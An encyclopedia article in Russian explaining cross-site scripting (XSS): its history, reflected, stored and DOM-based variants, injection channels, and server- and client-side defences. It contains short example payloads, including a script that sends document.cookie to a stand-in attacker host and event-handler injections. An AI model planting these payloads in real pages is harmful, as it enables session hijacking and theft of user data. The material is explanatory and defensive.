Межсайтовый скриптинг

XSS (англ. Cross-Site Scripting — «межсайтовый скриптинг») — подтип атаки на веб-системы, заключающийся во внедрении в выдаваемую веб-системой страницу вредоносного кода (который будет выполнен на компьютере пользователя при открытии им этой страницы) и взаимодействии этого кода с веб-сервером злоумышленника. Является разновидностью атаки «Внедрение кода».

Специфика подобных атак заключается в том, что вредоносный код может использовать авторизацию пользователя в веб-системе для получения к ней расширенного доступа или для получения авторизационных данных пользователя. Вредоносный код может быть вставлен в страницу как через уязвимость в веб-сервере, так и через уязвимость на компьютере пользователя[1].

Для термина используют сокращение «XSS», чтобы не было путаницы с каскадными таблицами стилей, использующими сокращение «CSS».

XSS находится на третьем месте в рейтинге ключевых рисков Web-приложений, согласно OWASP 2021[2]. Долгое время программисты не уделяли им должного внимания, считая их неопасными. Однако это мнение ошибочно: на странице или в HTTP-Cookie могут быть весьма уязвимые данные (например, идентификатор сессии администратора или номера платёжных документов), а там, где нет защиты от CSRF, атакующий может выполнить любые действия, доступные пользователю. Межсайтовый скриптинг может быть использован для проведения DoS-атаки[3].

Справочная информация

Безопасность в Интернете обеспечивается с помощью многих механизмов, в том числе важной концепцией, известной как правило ограничения домена. Это правило разрешает сценариям, находящимся на страницах одного сайта (https://mybank.example.com), доступ к методам и свойствам друг друга без ограничений, но предотвращает доступ к большинству методов и свойств для страниц другого сайта (https://othersite.example.com)[4].

Межсайтовый скриптинг использует известные уязвимости в web-приложениях, серверах (или в системных плагинах, относящихся к ним). Используя одну из них, злоумышленник встраивает вредоносный контент в содержание уже взломанного сайта. В результате пользователь получает объединенный контент в веб-браузере, который был доставлен из надежного источника, и, таким образом, действует в соответствии с разрешениями, предоставленными для этой системы. Сумев внедрить необходимый скрипт в веб-страницу, злоумышленник может получить повышенные привилегии в отношении работы с веб-страницами, cookies и другой информацией, хранящейся в браузере для данного пользователя.

Выражение «межсайтинговый скриптинг» первоначально означало взаимодействие уязвимого веб-приложения с сайтом злоумышленника таким образом, чтобы в контексте атакуемого домена был выполнен JavaScript-код, подготовленный злоумышленником (отражённая или хранимая XSS уязвимость). Постепенно определение стало включать в себя и другие способы внедрения кода, включая использование устойчивых и не относящихся к JavaScript языков (например, ActiveX, Java, VBScript, Flash и даже HTML), создавая путаницу среди новичков в сфере информационной безопасности.[5]

XSS уязвимости зарегистрированы и используются с середины 1990-x годов[6]. Известные сайты, пострадавшие в прошлом, включают такие сайты социальных сетей, как Twitter[7], ВКонтакте[8], MySpace[9], YouTube[10], Facebook[11] и др.

Классификация

Не существует чёткой классификации межсайтового скриптинга. Но большинство экспертов различает по крайней мере два типа XSS: «отраженные» («reflected XSS» или «Type 1») и «хранимые» («stored XSS» или «Type 2»).

По вектору

Отражённые (непостоянные)

Атака, основанная на отражённой уязвимости, на сегодняшний день является самой распространенной XSS-атакой[13]. Эти уязвимости появляются, когда данные, предоставленные веб-клиентом, чаще всего в параметрах HTTP-запроса или в форме HTML, исполняются непосредственно серверными скриптами для синтаксического анализа и отображения страницы результатов для этого клиента без надлежащей обработки[14]. Отражённая XSS-атака срабатывает, когда пользователь переходит по специально подготовленной ссылке.

Пример:

http://example.com/search.php?q=<script>DoSomething();</script>

Если сайт не экранирует угловые скобки, преобразуя их в «&lt;» и «&gt;», получим скрипт на странице результатов поиска.

Отражённые атаки, как правило, рассылаются по электронной почте или размещаются на Web-странице. URL приманки не вызывает подозрения, указывая на надёжный сайт, но содержит вектор XSS. Если доверенный сайт уязвим для вектора XSS, то переход по ссылке может привести к тому, что браузер жертвы начнет выполнять встроенный скрипт.

Хранимые (постоянные)

Хранимый XSS является наиболее разрушительным типом атаки. Хранимый XSS возможен, когда злоумышленнику удается внедрить на сервер вредоносный код, выполняющийся в браузере каждый раз при обращении к оригинальной странице. Классическим примером этой уязвимости являются форумы, на которых разрешено оставлять комментарии в HTML-формате без ограничений, а также другие сайты Веб 2.0 (блоги, вики, имиджборд), когда на сервере хранятся пользовательские тексты и рисунки. Скрипты вставляются в эти тексты и рисунки.

Фрагмент кода похищения ключа с идентификатором сессии (session ID):

<script>
document.location="http://attackerhost.example/cgi-bin/cookiesteal.cgi?"+document.cookie
</script>

DOM-модели

XSS в DOM-модели возникает на стороне клиента во время обработки данных внутри JavaScript-сценария. Данный тип XSS получил такое название, поскольку реализуется через DOM (Document Object Model) — не зависящий от платформы и языка программный интерфейс, позволяющий программам и сценариям получать доступ к содержимому HTML и XML-документов, а также изменять содержимое, структуру и оформление таких документов. При некорректной фильтрации возможно модифицировать DOM атакуемого сайта и добиться выполнения JavaScript-кода в контексте атакуемого сайта.

Пример:

<body>
<script>document.write(location.href);</script>
</body>

Пример DOM-модели XSS — баг, найденный в 2011 году в нескольких JQuery-плагинах[15]. Методы предотвращения DOM-модели XSS включают меры, характерные для традиционных XSS, но с реализацией на javascript и отправкой в веб-страницы — проверка ввода и предотвращение атаки[16]. Некоторые фреймворки javascript имеют встроенные защитные механизмы от этих и других типов атак, например, AngularJS[17].

По каналам внедрения скрипта

Ошибки в браузере

Из-за ошибок браузер может выполнять скрипты в SVG, нарушать правило Same Domain Policy. Это серьёзные ошибки; после обнаружения их быстро закрывают, однако в переходный период опасными становятся практически все сайты Веб 2.0: форумы, вики, имиджборды. Если такая ошибка обнаружилась, рекомендуется, пока не вышло обновление, пользоваться другим браузером.

Бывают и более тонкие ошибки, которые проявляются при очень специфичных условиях и крупного урона не наносят. Такие ошибки могут не исправляться годами и выгоднее исправить сайт, чем ждать обновления браузера.

Отсутствие экранирования спецсимволов HTML

Намного чаще встречаются ошибки на сайтах. Чтобы браузер гарантированно не принял строку за тег HTML, требуется заэкранировать пять символов: '"&<>. Сервер может экранировать не все символы (известный недостаток PHP[22]), либо веб-программист просто забывает заэкранировать строку.

Обычно в базах данных текст хранится неэкранированным, и экранировать требуется все пользовательские строки каждый раз, когда они встраиваются в HTML: например, если не заэкранирован URL картинки, пользователь может ввести что-то наподобие http://example.com/img.png" onmouseover="javascript:DoSomething();.

Многие сайты позволяют форматирование текста с помощью какого-либо языка разметки (HTML, BBCode, вики-разметка). Часто не проводится полный лексический анализ языка разметки, а лишь преобразование в «безопасный» HTML с помощью регулярных выражений[23]. Это упрощает программирование, однако требует досконального понимания, какими путями скрипт может проникнуть в результирующий HTML-код.

Отсутствие фильтрации атрибутов и их значений в разрешённых тегах

Типичным примером будет ссылка <a href="javascript:DoSomething()">. Даже если форум позволяет внешние ссылки, не стоит пускать протоколы javascript: и data:.

Не являются XSS, но не менее вредны и другие атаки: хакер может указать в качестве адреса сервер, имеющий узкий интернет-канал, парализуя его работу большим количеством запросов, или устроить с его помощью XSRF-атаку.

Подмена кодировки в заголовке страницы

Современные браузеры пытаются определить кодировку страницы на ходу и интерпретируют html в соответствии с этой кодировкой. В случае, если тег <title> расположен до тега <meta> и заполняется пользовательскими данными, хакер может вставить злонамеренный html-код в кодировке UTF-7, обойдя таким образом фильтрацию таких символов, как < и ". Для защиты от данной уязвимости следует явно указывать кодировку страницы до каких-либо пользовательских полей. HTML 5 прямо запрещает поддержку браузерами кодировки UTF-7 как потенциально опасной[24].

Социальная инженерия

Пользуясь социальной инженерией, злоумышленники добиваются того, что пользователь сам запускает вредоносный скрипт в браузере (на стороне клиента). Разработчики браузеров и веб-сайты принимают усилия по предотвращению атак такого типа[25].

Через внедрение SQL-кода

Если сайт и допускает внедрение SQL-кода, и выводит содержимое БД без всякого экранирования (то ли по незнанию, то ли в БД хранится готовый HTML-код[26], то ли автор точно знает, что «плохих» символов в БД нет), можно провести необычную атаку.

Внедрением SQL-кода записываем в БД «отравленную» страницу. Если кто-то получит доступ к этой строке БД, ему в браузер попадёт вредоносный скрипт. Бывают атаки и без хранения HTML в БД — СУБД вместо хранящегося в БД поля вернёт тот скрипт, который записан в тексте запроса.

По способу воздействия

Активные

Активная XSS атака не требует каких-либо действий со стороны пользователя с точки зрения функционала веб-приложения.

Пример:

<input type=text value=a onfocus=alert(1337) AUTOFOCUS>

В данном примере показано поле ввода, у которого установлен обработчик события появления фокуса, выполняющий собственно код атаки, а также у данного поля ввода активировано свойство автоматической установки фокуса. Таким образом автоматически устанавливается фокус, что вызывает обработчик установки фокуса, содержащий код атаки. Атака является активной и выполняется автоматически, не требуя от пользователя никакой активности.

Пассивные (автономные)

Пассивная XSS-атака срабатывает при выполнении пользователем определённого действия (клик или наведение указателя мыши и т. п.).

Пример:

<a href='a' onmouseover=alert(1337) style='font-size:500px'>

Пример показывает гиперссылку, особым образом привлекающую внимание пользователя, и/или занимающее значительное место, повышающее вероятность наведения указателя мыши, в данном случае крупным шрифтом. У гиперссылки установлен обработчик события наведения указателя мыши, содержащий код атаки. Атака является пассивной, так как бездействует, а код атаки не выполняется в ожидании наведения указателя мыши на ссылку пользователем.

Средства защиты

Защита на стороне сервера

  • Кодирование управляющих HTML-символов, JavaScript, CSS и URL перед отображением в браузере. Для фильтрации входных параметров можно использовать следующие функции: filter_sanitize_encoded (для кодирования URL)[28], htmlentities (для фильтрации HTML)[29].
  • Кодирование входных данных. Например с помощью библиотек OWASP Encoding Project[30], HTML Purifier, htmLawed, Anti-XSS Class.
  • Регулярный ручной и автоматизированный анализ безопасности кода и тестирование на проникновение. С использованием таких инструментов, как Nessus, Nikto Web Scanner и OWASP Zed Attack Proxy.
  • Указание кодировки на каждой web-странице (например, ISO-8859-1 или UTF-8) до каких-либо пользовательских полей[31].
  • Обеспечение безопасности cookies, которая может быть реализована путём ограничения домена и пути для принимаемых cookies, установки параметра HttpOnly[32], использованием SSL[33].
  • Использование заголовка Content Security Policy, позволяющего задавать список, в который заносятся желательные источники, с которых можно подгружать различные данные, например, JS, CSS, изображения и пр.

Защита на стороне клиента

  • Регулярное обновление браузера до новой версии[18].
  • Установка расширений для браузера, которые будут проверять поля форм, URL, JavaScript и POST-запросы, и, если встречаются скрипты, применять XSS-фильтры для предотвращения их запуска. Примеры подобных расширений: NoScript для FireFox, NotScripts для Chrome и Opera.

См. также

Примечания

  1. 1 2 Jatana1, Nishtha, Agrawal, Adwiteeya, Sobti, Kritika. Post XSS Exploitation: Advanced Attacks and Remedies (англ.). — P. 9. (недоступная ссылка)
  2. OWASP Top 10 (англ.). OWASP. The Open Web Application Security Project (OWASP). Дата обращения: 30 января 2022. Архивировано 17 января 2020 года.
  3. Seth Fogie, Jeremiah Grossman, 2007, pp. 290, 379.
  4. Same Origin Policy (англ.). W3C. Дата обращения: 18 декабря 2014. Архивировано 27 января 2017 года.
  5. Grossman, Jeremiah. The origins of Cross-Site Scripting (XSS). Дата обращения: 15 декабря 2014. Архивировано 21 февраля 2017 года. (англ.)
  6. Seth Fogie, Jeremiah Grossman, 2007, p. 3.
  7. Mirkov, Denis. Twitter заразили вирусом. Хакер (21 сентября 2010). Дата обращения: 18 декабря 2014. Архивировано 18 декабря 2014 года.
  8. Mirkov, Denis. XSS-уязвимости ВКонтакте. Хакер (10 марта 2011). Дата обращения: 18 декабря 2014. Архивировано 18 декабря 2014 года.
  9. Mirkov, Denis. Сайт Sla.ckers.org открыл подборку XSS уязвимостей. Хакер (25 сентября 2006). Дата обращения: 18 декабря 2014. Архивировано 18 декабря 2014 года.
  10. Mirkov, Denis. Множественные уязвимости в YouTube Blog. Хакер (23 июля 2008). Дата обращения: 18 декабря 2014. Архивировано 18 декабря 2014 года.
  11. Mirkov, Denis. На Facebook обнаружена XSS-уязвимость. Хакер (26 мая 2008). Дата обращения: 18 декабря 2014. Архивировано 18 декабря 2014 года.
  12. Тюрин, Алексей. В поисках лазеек: гид по DOM Based XSS // Хакер : Журнал. — 2013. — № 172. — С. 80-85. Архивировано 15 декабря 2014 года.
  13. Paco Hope, Ben Walther, 2008, p. 128.
  14. Cross-site Scripting (англ.). Web Application Security Consortium (2005). Дата обращения: 18 декабря 2014. Архивировано 1 июня 2010 года.
  15. JQuery bug #9521 (англ.). JQuery. Дата обращения: 18 декабря 2014. Архивировано 30 января 2017 года.
  16. DOM based XSS prevention cheat sheet (англ.). The Open Web Application Security Project (OWASP). Дата обращения: 18 декабря 2014. Архивировано 28 января 2017 года.
  17. Strict Contextual Escaping (англ.). AngularJS. Дата обращения: 18 декабря 2014. Архивировано 10 февраля 2014 года.
  18. 1 2 Cross-site Scripting (XSS) (англ.). The Open Web Application Security Project (OWASP). Дата обращения: 18 декабря 2014. Архивировано 22 декабря 2014 года.
  19. Bug 272620 - XSS vulnerability in internal error messages (англ.). Bugzilla@Mozilla. Дата обращения: 18 декабря 2014. Архивировано 30 октября 2014 года.
  20. US-CERT/NIST. Vulnerability Summary for CVE-2002-0902 (англ.) : сайт. — 2008. Архивировано 15 октября 2012 года.
  21. Boerwinkel, Martijn. Cross Site Scripting Vulnerability in phpBB2's IMG tag and remote avatar (англ.). seclists.org (26 мая 2002). Дата обращения: 18 декабря 2014. Архивировано 18 декабря 2014 года.
  22. Стандартная функция PHP htmlspecialchars по умолчанию не экранирует апостроф, и в сочетании с кодом "<a href='$htUrl'>" получается уязвимость.
  23. Простой парсинг BBcode на php. Веб-разработка. Дата обращения: 18 декабря 2014. Архивировано 18 декабря 2014 года.
  24. The elements of HTML — HTML Standard (англ.). Web Hypertext Application Technology Working Group (WHATWG). Дата обращения: 18 декабря 2014. Архивировано 21 декабря 2019 года.
  25. DevTools: Combat self-xss (англ.). Chromium. Дата обращения: 6 февраля 2024. Архивировано 6 февраля 2024 года.
  26. Например, движок MediaWiki кэширует HTML-код страниц.
  27. Kochetkov, Vladimir. Вся правда об XSS или Почему межсайтовое выполнение сценариев не является уязвимостью? SecurityLab (8 августа 2012). Дата обращения: 18 декабря 2014. Архивировано 19 декабря 2014 года.
  28. Очищающие фильтры. PHP. Дата обращения: 18 декабря 2014. Архивировано 19 декабря 2014 года.
  29. PHP:htmlentities (англ.). PHP. Дата обращения: 18 декабря 2014. Архивировано 19 декабря 2014 года.
  30. OWASP Java Encoder Project. The Open Web Application Security Project (OWASP). Дата обращения: 18 декабря 2014. Архивировано 2 ноября 2014 года.
  31. Сноу, Джон. Маскарад символов: unicode-ориентированные аспекты безопасности // Хакер : сайт. — 2010. Архивировано 19 декабря 2014 года.
  32. HttpOnly (англ.). The Open Web Application Security Project (OWASP). Дата обращения: 18 декабря 2014. Архивировано 26 декабря 2008 года.
  33. Hafner, Robert. How to create totally secure cookies (англ.) : сайт. — 2009. Архивировано 19 декабря 2014 года.

Литература

  • Seth Fogie, Jeremiah Grossman, Robert Hansen, Anton Rager, Petko D. Petkov. XSS атаки: эксплуатация и защита = XSS Attacks: Cross Site Scripting Exploits and Defense. — Syngress, 2007. — 464 p. — ISBN 1597491543.
  • Paco Hope, Ben Walther. Web Security Testing Cookbook. — O'Reilly Media, 2008. — 314 p. — ISBN 978-0-596-51483-9.

Ссылки


Read other articles:

Untuk kegunaan lain, lihat Respirator. Sebuah masker bedah Sampah masker bedah yang dibuang sembarangan Tenaga medis profesional memakai masker bedah selama operasi Masker medis, juga dikenal sebagai masker bedah atau sekadar masker wajah atau sungkup muka[1][2] adalah masker yang dimaksudkan untuk dipakai oleh para tenaga kesehatan selama tindakan pembedahan dan selama perawatan untuk menahan bakteri yang terkandung dalam percikan cairan (droplet) dan aerosol dari hidung dan ...

 

Stencil que denuncia la manipulación televisiva. La manipulación de los medios de comunicación consiste en una serie de técnicas relacionadas entre sí con las que miembros de un determinado grupo crean una imagen o una idea que favorece sus intereses particulares.[1]​ Entre estas tácticas destacan las falacias lógicas y la propaganda, que a menudo implican la supresión de información o de otros puntos de vista a través de su distorsión, induciendo a otras personas o grupos de...

 

Shoot to ThrillLagu oleh AC/DCdari album Back in BlackDirilis25 July 1980Direkam1980GenreHard rockDurasi5:17LabelAtlanticPencipta Angus Young Malcolm Young Brian Johnson ProduserRobert John Mutt Lange Shoot to Thrill merupakan salah satu lagu dari band Rock and Roll asal Australia, AC/DC. Lagu ini merupakan lagu kedua dalam album Back in Black yang dirilis pada 25 Juni 1980.[1] Lagu ini juga merupakan lagu kedua dalam album AC/DC Live[2] dan AC/DC Live (1992, Special Collector...

  لمعانٍ أخرى، طالع فورت (توضيح). فورت    علم شعار الاسم الرسمي (بالألمانية: Fürth)‏    الإحداثيات 49°28′42″N 10°59′25″E / 49.478333333333°N 10.990277777778°E / 49.478333333333; 10.990277777778   [1] تقسيم إداري  البلد ألمانيا (3 أكتوبر 1990–) ألمانيا الغربية (23 مايو 1949–2 أكتوبر ...

 

Antacid medication Bismuth subsalicylateClinical dataTrade namesPepto-Bismol, BisBacterAHFS/Drugs.comMultum Consumer InformationMedlinePlusa607040Routes ofadministrationOralATC codenoneLegal statusLegal status UK: P (Pharmacy medicines) US: OTC Identifiers IUPAC name 2-Hydroxy-2H,4H-benzo[d]1,3-dioxa-2-bismacyclohexan-4-one Simplified molecular structure of bismuth subsalicylate. CAS Number14882-18-9 YPubChem CID16682734DrugBankDB01294 YChemSpider17215772 YUNII62TEY51...

 

DongxiangدْوݣسِيْاݣSeorang siswa Dongxiang di sekolah.Jumlah populasi621,500Daerah dengan populasi signifikan621,500 (sensus 2010) di GansuBahasaSantaAgamaIslam SunniKelompok etnik terkaitBonan, Hui Bagian dari serial tentang: Islam di Tiongkok Sejarah Islam di Tiongkok Menurut dinasti Tang Song Yuan Ming Qing Pemberontakan Pemberontakan Panthay (1856–1873) Pemberontakan Dungan pertama (1862–1877) Pemberontakan Dungan kedua (1895–1896) Pemberontakan Afaqi Khoja Tiongkok pascad...

2012 single by Monica and BrandyIt All Belongs to MeSingle by Monica and Brandyfrom the album New Life ReleasedFebruary 13, 2012GenreR&BpopLength4:04LabelRCASongwriter(s)Rico LoveEarl HoodEric Goudy IIProducer(s)Rico LoveEarl & EMonica singles chronology Until It's Gone(2011) It All Belongs to Me(2012) Without You(2012) Brandy singles chronology Talk to Me(2010) It All Belongs to Me(2012) Put It Down(2012) It All Belongs to Me is a duet by American recording artists Monica and...

 

追晉陸軍二級上將趙家驤將軍个人资料出生1910年 大清河南省衛輝府汲縣逝世1958年8月23日(1958歲—08—23)(47—48歲) † 中華民國福建省金門縣国籍 中華民國政党 中國國民黨获奖 青天白日勳章(追贈)军事背景效忠 中華民國服役 國民革命軍 中華民國陸軍服役时间1924年-1958年军衔 二級上將 (追晉)部队四十七師指挥東北剿匪總司令部參謀長陸軍�...

 

Centre for research European Bioinformatics Institute (EBI)AbbreviationEMBL-EBIFormation1992[1]LocationWellcome Genome Campus, Hinxton, Cambridgeshire, UKCoordinates52.079889, 0.186356DirectorEwan BirneyDirectorRolf ApweilerParent organizationEuropean Molecular Biology LaboratoryStaff 570[2]Websitewww.ebi.ac.uk The European Bioinformatics Institute (EMBL-EBI) is an intergovernmental organization (IGO) which, as part of the European Molecular Biology Laboratory (EMBL) family, f...

Сельское поселение России (МО 2-го уровня)Новотитаровское сельское поселение Флаг[d] Герб 45°14′09″ с. ш. 38°58′16″ в. д.HGЯO Страна  Россия Субъект РФ Краснодарский край Район Динской Включает 4 населённых пункта Адм. центр Новотитаровская Глава сельского пос�...

 

Chinese people in Ireland愛爾蘭華人Sínigh in ÉirinnChinese New Year celebration in Dublin, 2008Total population19,447 (2016)Regions with significant populationsDublinLanguagesMandarin, Cantonese, English, IrishReligionIrreligion, Buddhism, Atheism, ChristianityRelated ethnic groupsOverseas Chinese, British Chinese Hazel Chu as Lord Mayor of Dublin in 2021 Recitation of Chinese poetry at Dublin Connolly railway station to celebrate Chinese New Year. Chinese people in Ireland refer to pe...

 

American football player (born 1998) American football player Terrell LewisLewis with the Los Angeles Rams in 2020No. 46 – Philadelphia EaglesPosition:LinebackerPersonal informationBorn: (1998-08-25) August 25, 1998 (age 25)Washington, D.C., U.S.Height:6 ft 5 in (1.96 m)Weight:262 lb (119 kg)Career informationHigh school:St. John's College (Washington, D.C.)College:Alabama (2016–2019)NFL draft:2020 / Round: 3 / Pick: 84Career history Los A...

土库曼斯坦总统土库曼斯坦国徽土库曼斯坦总统旗現任谢尔达尔·别尔德穆哈梅多夫自2022年3月19日官邸阿什哈巴德总统府(Oguzkhan Presidential Palace)機關所在地阿什哈巴德任命者直接选举任期7年,可连选连任首任萨帕尔穆拉特·尼亚佐夫设立1991年10月27日 土库曼斯坦土库曼斯坦政府与政治 国家政府 土库曼斯坦宪法 国旗 国徽 国歌 立法機關(英语:National Council of Turkmenistan) ...

 

Forte KleinbodenWerk KleinbodenFortificazioni austriache al confine italianoUbicazioneStato Austria-Ungheria Stato attuale Italia RegioneTrentino-Alto Adige CittàStelvio, Bolzano Coordinate46°34′08.06″N 10°30′41.81″E / 46.568906°N 10.511614°E46.568906; 10.511614Coordinate: 46°34′08.06″N 10°30′41.81″E / 46.568906°N 10.511614°E46.568906; 10.511614 Informazioni generaliTipoFortezza Altezza2000 m s.l.m. Primo proprietarioImperial ...

 

Catalysis is a software design method for the specification and design of component-based computer systems originally developed by Desmond D’Souza and Alan Cameron Wills in their 1999 book.[1] Catalysis focuses on how to make precise abstractions, and emphasizes the formal specification of use cases using pre- and postconditions and ‘guarantees’ clauses. It also places stress on the specification of collaboration protocols so that kits of components can interact in a coherent �...

Sporting event delegationMoldova at the2022 World Athletics ChampionshipsFlag of MoldovaWA codeMDAin Eugene, United States15 July 2022 (2022-07-15) – 24 July 2022 (2022-07-24)Competitors5 (2 men and 3 women)Medals Gold 0 Silver 0 Bronze 0 Total 0 World Athletics Championships appearances1993199519971999200120032005200720092011201320152017201920222023← 2019 2023 → Moldova competed at the 2022 World Athletics Championships in Eugene, U...

 

Indonesiadalam tahun2002 ← 2000 2001 2002 2003 2004 → Dekade :2000-anAbad :ke-21Milenium :ke-3Lihat juga Sejarah Indonesia Garis waktu sejarah Indonesia Indonesia menurut tahun Bagian dari seri mengenai Sejarah Indonesia Prasejarah Manusia Jawa 1.000.000 BP Manusia Flores 94.000–12.000 BP Bencana alam Toba 75.000 BP Kebudayaan Buni 400 SM Kerajaan Hindu-Buddha Kerajaan Kutai 400–1635 Kerajaan Tarumanagara 450–900 Kerajaan Kalingga 594–782 Kerajaa...

 

Artikel ini sebatang kara, artinya tidak ada artikel lain yang memiliki pranala balik ke halaman ini.Bantulah menambah pranala ke artikel ini dari artikel yang berhubungan atau coba peralatan pencari pranala.Tag ini diberikan pada Desember 2022. Luigi AlmiranteLahir(1886-09-30)30 September 1886Tunis, TunisiaMeninggal6 Mei 1963(1963-05-06) (umur 76)Roma, ItaliaPekerjaanPemeranTahun aktif1921–1955 Luigi Almirante (30 September 1884 – 6 Mei 1963) adalah seorang pemera...

Thomas Cranmerarcivescovo della Chiesa anglicanaRitratto di Thomas Cranmer, Londra, National Portrait Gallery  Incarichi ricopertiArcivescovo di Canterbury (1533-1555)  Nato2 luglio 1489 ad Aslockton Ordinato presbitero1520 Consacrato arcivescovo30 marzo 1533 Deceduto21 marzo 1556 (66 anni) a Oxford Firma   Manuale Thomas Cranmer (Aslockton, 2 luglio 1489 – Oxford, 21 marzo 1556) è stato un arcivescovo anglicano inglese, arcivescovo di Canterbury sotto i regni dei sovra...

 

Voce principale: Nazionale di pallacanestro della Serbia. SerbiaUniformi di gara Casa Trasferta Sport Pallacanestro FederazioneFederazione cestistica della Serbia ConfederazioneFIBA (dal ) Zona FIBAFIBA Europe Ranking FIBAº Le selezioni giovanili della nazionale di pallacanestro della Serbia, sono state gestite dalla Federazione cestistica della Serbia e partecipavano ai tornei cestistici internazionali per squadre nazionali, limitatamente a specifiche classi d'età. Indice 1 Universitaria ...